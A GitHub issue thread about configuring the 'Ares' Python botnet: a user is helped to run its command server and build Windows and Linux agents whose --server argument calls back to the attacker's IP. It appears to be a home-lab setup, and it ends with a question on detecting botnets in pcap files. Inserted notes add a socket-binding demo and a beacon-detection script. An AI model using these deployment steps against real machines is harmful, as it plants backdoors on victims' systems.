sweetsoftware / Ares

Python botnet and backdoor

Ares: Modify server IP address #73

Open ghost opened 4 years ago

ghost commented 4 years ago

I want to use Ares tool but I find some problems that's why I'm writing to you.

I want to configure my server IP to something like 192.168.1.x on my Linux machine and put my agent on my Windows machine (physically separated).

when I do

./ares.py runserver -h 192.168.1.x -p 8080 --threade

it does not work.

Any help please ?

Thanks in advance.

ghost commented 4 years ago

No idea ?

target111 commented 4 years ago

How do you run the agent? And is it on a separate network?

ghost commented 4 years ago

Sorry for the delay. I had a problem with my machines and was unable to give you the right response.

I think that the problem is in the run of the agent. Both server and agent are in the same network.

The server is on a machine with IP 192.168.1.201 (on Linux) and the agent is on a machine with IP 192.168.1.2 (on Windows).

I run the server like that ./ares.py runserver -h 0.0.0.0 -p 8082 --threaded

Then I modify the agent config by putting localhost:8082 in the config.py (in the first line)

Then I did :

cd agent
./agent.py
./builder.py -p Windows --server http://localhost:8080 -o agent.exe

Then I retrieved the agent.exe file and executed it on windows machine

And Finally, I go back to linux to refresh my server page but I got no agent in the agent list.

Please any help

target111 commented 4 years ago

Replace localhost:8080 with 192.168.1.201:8082(your server address) in the builder.py line and it should work.

ghost commented 4 years ago

I kept the same address localhost:8080 for the running server and for the agent. I succeeded in running the server and getting my agent.exe with:

./builder.py -p Windows --server http://localhost:8080 -o agent.exe

But when I run my agent.exe on the victim machine, which is a Windows machine, I didn't see my agent in the agent list on my attacker machine (Linux). I don't know why.

Also When I did :

cd agent
./agent.py

I got this message:
Persistence only supported on compiled agents.

Is it normal ?

Thanks in advance for your response please.

target111 commented 4 years ago

Yes the persistence bit is normal.

Second: Server is fine. The reason you don't see the agent connect to the server when you run the exe on another machine is because you're not using the correct IP when you compile it. You need to change the builder.py line to this for it to actually work:

./builder.py -p Windows --server http://192.168.1.201:8082 -o agent.exe

The reason why is because you need to have the same IP address as the server and the same port.

ghost commented 4 years ago

Even though, the server is running on 0.0.0.0 : 8080 I have to compile the agent with : ./builder.py -p Windows --server http://192.168.1.201:8080 -o agent.exe ?

Another question please, should I modify the IP address in builder.py also (I mean put 192.168.1.201:8080 instead of localhost:8080)?

target111 commented 4 years ago

Yep, that's correct, in the builder.py you need to use the server's IPv4 address, not localhost, which is only accessible from the same machine. 0.0.0.0 means all IPv4 addresses on the local machine. If a host has two IP addresses, 192.168.1.1 and 10.1.2.1, and a server running on the host listens on 0.0.0.0, it will be reachable at both of those IPs.
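The bind-address behaviour described in the comment above, as an added example that is not part of the thread or of the Ares code: a listener bound to one address answers only on that address, while one bound to 0.0.0.0 answers on every local address, which is also why wildcard listeners are worth auditing for unintended exposure. It assumes a Linux host, where the whole 127.0.0.0/8 range is local, so 127.0.0.2 stands in for the host's second address.

```python
import socket


def listener(bind_addr):
    """Open a TCP listener on an ephemeral port; return (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((bind_addr, 0))  # port 0: let the kernel pick a free port
    srv.listen(5)
    return srv, srv.getsockname()[1]


def can_connect(dest_addr, port, timeout=1.0):
    """True if a TCP handshake to dest_addr:port completes."""
    try:
        with socket.create_connection((dest_addr, port), timeout=timeout):
            return True
    except OSError:
        return False


def reachability(bind_addr, dest_addrs=("127.0.0.1", "127.0.0.2")):
    """Bind to bind_addr, then try the same port via each local address.

    Assumption: 127.0.0.2 is a second local address (true on Linux).
    """
    srv, port = listener(bind_addr)
    try:
        return {dest: can_connect(dest, port) for dest in dest_addrs}
    finally:
        srv.close()


if __name__ == "__main__":
    for bind in ("127.0.0.1", "0.0.0.0"):
        print(f"bound to {bind}: {reachability(bind)}")
```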

ghost commented 4 years ago

Firstly thank you so much for your help. I have always the problem. Well I will summarize all what I did, maybe you can tell me what escapes me: after launching the server with :

./ares.py runserver -h 0.0.0.0 -p 8080 --threade

I modified the IP address in config.py by putting 192.168.1.201:8080

Then I compiled the agent with:

./agent.py

Then I built the agent with:

./builder.py -p Windows --server http://192.168.1.201:8080 -o agent.exe

Then I sent the agent.exe file to the victim machine and ran it on the latter. Then I came back to my attacker machine and refreshed the server web page, but I didn't find my victim machine in the agent list.

Are my steps right please? Thanks in advance.

target111 commented 4 years ago

All looks good, are the server and victim computer on the same network? Maybe check if the server's IP hasn't changed or check for a firewall.

ghost commented 4 years ago

Yes. Both victim and attacker machines are in the same network. The victim machine IP is 192.168.1.2 and the attacker machine IP is 192.168.1.201. The server IP hasn't changed and the firewalls are disabled on both machines (see the attached files).

ghost commented 4 years ago

Hi, since on Windows I get a problem with the Ares botnet, I am testing it now on a Linux machine, so I did the same steps as for the Windows machine except for building the agent, where I executed this command:

./builder.py -p Linux --server http://192.168.1.201:8080 -o agent

But the problem is when I run the agent on the victim machine with these commands:

sudo chmod +x agent
./agent

I got this error message:

Segmentation error.

Do you have any idea about the origin of this error please?

ghost commented 4 years ago

Hi Sir,

Please I have a question. Ares botnet works now on my machine and I need to know if there is a way or some element which can help me to detect the presence of a botnet from my network traffic file (pcap file)? Thanks in advance for your help.
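One common starting point for the pcap question above, as an added example that is not part of the thread or of the Ares project: flag client/server pairs whose connections recur at near-constant intervals, since a timer-driven agent produces far more regular gaps than a person browsing. It assumes the agent checks in to its server on a timer (the thread does not say so) and that one record per new TCP connection has already been exported from the capture; every row below is constructed, and `find_beacons` and its thresholds are hypothetical names and values.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample rows: (epoch seconds, client IP, server IP, server port).
OFFSETS = [0.0, 0.3, -0.2, 0.1, 0.4, -0.3, 0.0, 0.2, -0.1, 0.3, -0.4, 0.1]
FLOWS = (
    # Timer-like: roughly every 10 s to one fixed server and port.
    [(1000 + 10 * i + off, "192.168.1.2", "192.168.1.201", 8080)
     for i, off in enumerate(OFFSETS)]
    # Human-like: bursts and pauses towards a web server (documentation IP).
    + [(t, "192.168.1.2", "203.0.113.10", 80)
       for t in (1003, 1004, 1009, 1040, 1041, 1058, 1090, 1092, 1117)]
    # Too few connections to judge either way.
    + [(t, "192.168.1.7", "192.168.1.201", 8080) for t in (1020, 1090)]
)


def find_beacons(flows, min_events=8, max_jitter=0.1):
    """Return (client, server, port, mean_gap, jitter) for periodic pairs.

    jitter is the coefficient of variation of the gaps between successive
    connections: close to 0 for a timer, large for interactive traffic.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_pair[(src, dst, dport)].append(ts)

    hits = []
    for (src, dst, dport), times in by_pair.items():
        if len(times) < min_events:
            continue  # not enough samples for a stable estimate
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        jitter = pstdev(gaps) / avg
        if jitter <= max_jitter:
            hits.append((src, dst, dport, round(avg, 2), round(jitter, 3)))
    return sorted(hits, key=lambda h: h[4])  # most regular first


if __name__ == "__main__":
    for hit in find_beacons(FLOWS):
        print(hit)
```

Agents that randomise their check-in interval raise the jitter, so in practice this is combined with other signals such as long-lived repetition to a single rare destination.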